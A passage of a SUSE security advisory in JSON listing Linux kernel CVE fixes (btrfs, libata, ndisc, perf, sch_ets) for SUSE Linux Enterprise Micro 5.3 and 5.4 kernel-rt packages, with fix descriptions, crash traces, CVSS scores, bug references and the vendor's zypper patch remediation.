"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: avoid NULL pointer dereference if no valid extent tree\n\n[BUG]\nSyzbot reported a crash with the following call trace:\n\n BTRFS info (device loop0): scrub: started on devid 1\n BUG: kernel NULL pointer dereference, address: 0000000000000208\n #PF: supervisor read access in kernel mode\n #PF: error_code(0x0000) - not-present page\n PGD 106e70067 P4D 106e70067 PUD 107143067 PMD 0\n Oops: Oops: 0000 [#1] PREEMPT SMP NOPTI\n CPU: 1 UID: 0 PID: 689 Comm: repro Kdump: loaded Tainted: G O 6.13.0-rc4-custom+ #206\n Tainted: [O]=OOT_MODULE\n Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS unknown 02/02/2022\n RIP: 0010:find_first_extent_item+0x26/0x1f0 [btrfs]\n Call Trace:\n \u003cTASK\u003e\n scrub_find_fill_first_stripe+0x13d/0x3b0 [btrfs]\n scrub_simple_mirror+0x175/0x260 [btrfs]\n scrub_stripe+0x5d4/0x6c0 [btrfs]\n scrub_chunk+0xbb/0x170 [btrfs]\n scrub_enumerate_chunks+0x2f4/0x5f0 [btrfs]\n btrfs_scrub_dev+0x240/0x600 [btrfs]\n btrfs_ioctl+0x1dc8/0x2fa0 [btrfs]\n ? do_sys_openat2+0xa5/0xf0\n __x64_sys_ioctl+0x97/0xc0\n do_syscall_64+0x4f/0x120\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n \u003c/TASK\u003e\n\n[CAUSE]\nThe reproducer is using a corrupted image where extent tree root is\ncorrupted, thus forcing to use \"rescue=all,ro\" mount option to mount the\nimage.\n\nThen it triggered a scrub, but since scrub relies on extent tree to find\nwhere the data/metadata extents are, scrub_find_fill_first_stripe()\nrelies on an non-empty extent root.\n\nBut unfortunately scrub_find_fill_first_stripe() doesn\u0027t really expect\nan NULL pointer for extent root, it use extent_root to grab fs_info and\ntriggered a NULL pointer dereference.\n\n[FIX]\nAdd an extra check for a valid extent root at the beginning of\nscrub_find_fill_first_stripe().\n\nThe new error path is introduced by 42437a6386ff (\"btrfs: introduce\nmount option rescue=ignorebadroots\"), but that\u0027s pretty old, and later\ncommit b979547513ff (\"btrfs: scrub: introduce helper to find and fill\nsector info for a scrub_stripe\") changed how we do scrub.\n\nSo for kernels older than 6.6, the fix will need manual backport.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-21658",
"url": "https://www.suse.com/security/cve/CVE-2025-21658"
},
{
"category": "external",
"summary": "SUSE Bug 1236208 for CVE-2025-21658",
"url": "https://bugzilla.suse.com/1236208"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "moderate"
}
],
"title": "CVE-2025-21658"
},
{
"cve": "CVE-2025-21738",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-21738"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nata: libata-sff: Ensure that we cannot write outside the allocated buffer\n\nreveliofuzzing reported that a SCSI_IOCTL_SEND_COMMAND ioctl with out_len\nset to 0xd42, SCSI command set to ATA_16 PASS-THROUGH, ATA command set to\nATA_NOP, and protocol set to ATA_PROT_PIO, can cause ata_pio_sector() to\nwrite outside the allocated buffer, overwriting random memory.\n\nWhile a ATA device is supposed to abort a ATA_NOP command, there does seem\nto be a bug either in libata-sff or QEMU, where either this status is not\nset, or the status is cleared before read by ata_sff_hsm_move().\nAnyway, that is most likely a separate bug.\n\nLooking at __atapi_pio_bytes(), it already has a safety check to ensure\nthat __atapi_pio_bytes() cannot write outside the allocated buffer.\n\nAdd a similar check to ata_pio_sector(), such that also ata_pio_sector()\ncannot write outside the allocated buffer.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-21738",
"url": "https://www.suse.com/security/cve/CVE-2025-21738"
},
{
"category": "external",
"summary": "SUSE Bug 1238917 for CVE-2025-21738",
"url": "https://bugzilla.suse.com/1238917"
},
{
"category": "external",
"summary": "SUSE Bug 1257118 for CVE-2025-21738",
"url": "https://bugzilla.suse.com/1257118"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "important"
}
],
"title": "CVE-2025-21738"
},
{
"cve": "CVE-2025-21760",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-21760"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nndisc: extend RCU protection in ndisc_send_skb()\n\nndisc_send_skb() can be called without RTNL or RCU held.\n\nAcquire rcu_read_lock() earlier, so that we can use dev_net_rcu()\nand avoid a potential UAF.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-21760",
"url": "https://www.suse.com/security/cve/CVE-2025-21760"
},
{
"category": "external",
"summary": "SUSE Bug 1238763 for CVE-2025-21760",
"url": "https://bugzilla.suse.com/1238763"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "moderate"
}
],
"title": "CVE-2025-21760"
},
{
"cve": "CVE-2025-21764",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-21764"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nndisc: use RCU protection in ndisc_alloc_skb()\n\nndisc_alloc_skb() can be called without RTNL or RCU being held.\n\nAdd RCU protection to avoid possible UAF.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-21764",
"url": "https://www.suse.com/security/cve/CVE-2025-21764"
},
{
"category": "external",
"summary": "SUSE Bug 1237885 for CVE-2025-21764",
"url": "https://bugzilla.suse.com/1237885"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "moderate"
}
],
"title": "CVE-2025-21764"
},
{
"cve": "CVE-2025-21765",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-21765"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: use RCU protection in ip6_default_advmss()\n\nip6_default_advmss() needs rcu protection to make\nsure the net structure it reads does not disappear.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-21765",
"url": "https://www.suse.com/security/cve/CVE-2025-21765"
},
{
"category": "external",
"summary": "SUSE Bug 1237906 for CVE-2025-21765",
"url": "https://bugzilla.suse.com/1237906"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "moderate"
}
],
"title": "CVE-2025-21765"
},
{
"cve": "CVE-2025-21766",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-21766"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv4: use RCU protection in __ip_rt_update_pmtu()\n\n__ip_rt_update_pmtu() must use RCU protection to make\nsure the net structure it reads does not disappear.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-21766",
"url": "https://www.suse.com/security/cve/CVE-2025-21766"
},
{
"category": "external",
"summary": "SUSE Bug 1238754 for CVE-2025-21766",
"url": "https://bugzilla.suse.com/1238754"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "moderate"
}
],
"title": "CVE-2025-21766"
},
{
"cve": "CVE-2025-38563",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38563"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nperf/core: Prevent VMA split of buffer mappings\n\nThe perf mmap code is careful about mmap()\u0027ing the user page with the\nringbuffer and additionally the auxiliary buffer, when the event supports\nit. Once the first mapping is established, subsequent mapping have to use\nthe same offset and the same size in both cases. The reference counting for\nthe ringbuffer and the auxiliary buffer depends on this being correct.\n\nThough perf does not prevent that a related mapping is split via mmap(2),\nmunmap(2) or mremap(2). A split of a VMA results in perf_mmap_open() calls,\nwhich take reference counts, but then the subsequent perf_mmap_close()\ncalls are not longer fulfilling the offset and size checks. This leads to\nreference count leaks.\n\nAs perf already has the requirement for subsequent mappings to match the\ninitial mapping, the obvious consequence is that VMA splits, caused by\nresizing of a mapping or partial unmapping, have to be prevented.\n\nImplement the vm_operations_struct::may_split() callback and return\nunconditionally -EINVAL.\n\nThat ensures that the mapping offsets and sizes cannot be changed after the\nfact. Remapping to a different fixed address with the same size is still\npossible as it takes the references for the new mapping and drops those of\nthe old mapping.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38563",
"url": "https://www.suse.com/security/cve/CVE-2025-38563"
},
{
"category": "external",
"summary": "SUSE Bug 1248306 for CVE-2025-38563",
"url": "https://bugzilla.suse.com/1248306"
},
{
"category": "external",
"summary": "SUSE Bug 1248307 for CVE-2025-38563",
"url": "https://bugzilla.suse.com/1248307"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "important"
}
],
"title": "CVE-2025-38563"
},
{
"cve": "CVE-2025-38565",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38565"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nperf/core: Exit early on perf_mmap() fail\n\nWhen perf_mmap() fails to allocate a buffer, it still invokes the\nevent_mapped() callback of the related event. On X86 this might increase\nthe perf_rdpmc_allowed reference counter. But nothing undoes this as\nperf_mmap_close() is never called in this case, which causes another\nreference count leak.\n\nReturn early on failure to prevent that.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38565",
"url": "https://www.suse.com/security/cve/CVE-2025-38565"
},
{
"category": "external",
"summary": "SUSE Bug 1248377 for CVE-2025-38565",
"url": "https://bugzilla.suse.com/1248377"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "low"
}
],
"title": "CVE-2025-38565"
},
{
"cve": "CVE-2025-38684",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38684"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: ets: use old \u0027nbands\u0027 while purging unused classes\n\nShuang reported sch_ets test-case [1] crashing in ets_class_qlen_notify()\nafter recent changes from Lion [2]. The problem is: in ets_qdisc_change()\nwe purge unused DWRR queues; the value of \u0027q-\u003enbands\u0027 is the new one, and\nthe cleanup should be done with the old one. The problem is here since my\nfirst attempts to fix ets_qdisc_change(), but it surfaced again after the\nrecent qdisc len accounting fixes. Fix it purging idle DWRR queues before\nassigning a new value of \u0027q-\u003enbands\u0027, so that all purge operations find a\nconsistent configuration:\n\n - old \u0027q-\u003enbands\u0027 because it\u0027s needed by ets_class_find()\n - old \u0027q-\u003enstrict\u0027 because it\u0027s needed by ets_class_is_strict()\n\n BUG: kernel NULL pointer dereference, address: 0000000000000000\n #PF: supervisor read access in kernel mode\n #PF: error_code(0x0000) - not-present page\n PGD 0 P4D 0\n Oops: Oops: 0000 [#1] SMP NOPTI\n CPU: 62 UID: 0 PID: 39457 Comm: tc Kdump: loaded Not tainted 6.12.0-116.el10.x86_64 #1 PREEMPT(voluntary)\n Hardware name: Dell Inc. PowerEdge R640/06DKY5, BIOS 2.12.2 07/09/2021\n RIP: 0010:__list_del_entry_valid_or_report+0x4/0x80\n Code: ff 4c 39 c7 0f 84 39 19 8e ff b8 01 00 00 00 c3 cc cc cc cc 66 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 f3 0f 1e fa \u003c48\u003e 8b 17 48 8b 4f 08 48 85 d2 0f 84 56 19 8e ff 48 85 c9 0f 84 ab\n RSP: 0018:ffffba186009f400 EFLAGS: 00010202\n RAX: 00000000000000d6 RBX: 0000000000000000 RCX: 0000000000000004\n RDX: ffff9f0fa29b69c0 RSI: 0000000000000000 RDI: 0000000000000000\n RBP: ffffffffc12c2400 R08: 0000000000000008 R09: 0000000000000004\n R10: ffffffffffffffff R11: 0000000000000004 R12: 0000000000000000\n R13: ffff9f0f8cfe0000 R14: 0000000000100005 R15: 0000000000000000\n FS: 00007f2154f37480(0000) GS:ffff9f269c1c0000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 0000000000000000 CR3: 00000001530be001 CR4: 00000000007726f0\n DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\n PKRU: 55555554\n Call Trace:\n \u003cTASK\u003e\n ets_class_qlen_notify+0x65/0x90 [sch_ets]\n qdisc_tree_reduce_backlog+0x74/0x110\n ets_qdisc_change+0x630/0xa40 [sch_ets]\n __tc_modify_qdisc.constprop.0+0x216/0x7f0\n tc_modify_qdisc+0x7c/0x120\n rtnetlink_rcv_msg+0x145/0x3f0\n netlink_rcv_skb+0x53/0x100\n netlink_unicast+0x245/0x390\n netlink_sendmsg+0x21b/0x470\n ____sys_sendmsg+0x39d/0x3d0\n ___sys_sendmsg+0x9a/0xe0\n __sys_sendmsg+0x7a/0xd0\n do_syscall_64+0x7d/0x160\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n RIP: 0033:0x7f2155114084\n Code: 89 02 b8 ff ff ff ff eb bb 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 f3 0f 1e fa 80 3d 25 f0 0c 00 00 74 13 b8 2e 00 00 00 0f 05 \u003c48\u003e 3d 00 f0 ff ff 77 54 c3 0f 1f 00 48 83 ec 28 89 54 24 1c 48 89\n RSP: 002b:00007fff1fd7a988 EFLAGS: 00000202 ORIG_RAX: 000000000000002e\n RAX: ffffffffffffffda RBX: 0000560ec063e5e0 RCX: 00007f2155114084\n RDX: 0000000000000000 RSI: 00007fff1fd7a9f0 RDI: 0000000000000003\n RBP: 00007fff1fd7aa60 R08: 0000000000000010 R09: 000000000000003f\n R10: 0000560ee9b3a010 R11: 0000000000000202 R12: 00007fff1fd7aae0\n R13: 000000006891ccde R14: 0000560ec063e5e0 R15: 00007fff1fd7aad0\n \u003c/TASK\u003e\n\n [1] https://lore.kernel.org/netdev/e08c7f4a6882f260011909a868311c6e9b54f3e4.1639153474.git.dcaratti@redhat.com/\n [2] https://lore.kernel.org/netdev/d912cbd7-193b-4269-9857-525bee8bbb6a@gmail.com/",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38684",
"url": "https://www.suse.com/security/cve/CVE-2025-38684"
},
{
"category": "external",
"summary": "SUSE Bug 1249156 for CVE-2025-38684",
"url": "https://bugzilla.suse.com/1249156"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "moderate"
}
],
"title": "CVE-2025-38684"
},
{
"cve": "CVE-2025-40044",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40044"
}
],
"notes": [
{
"category": "general",
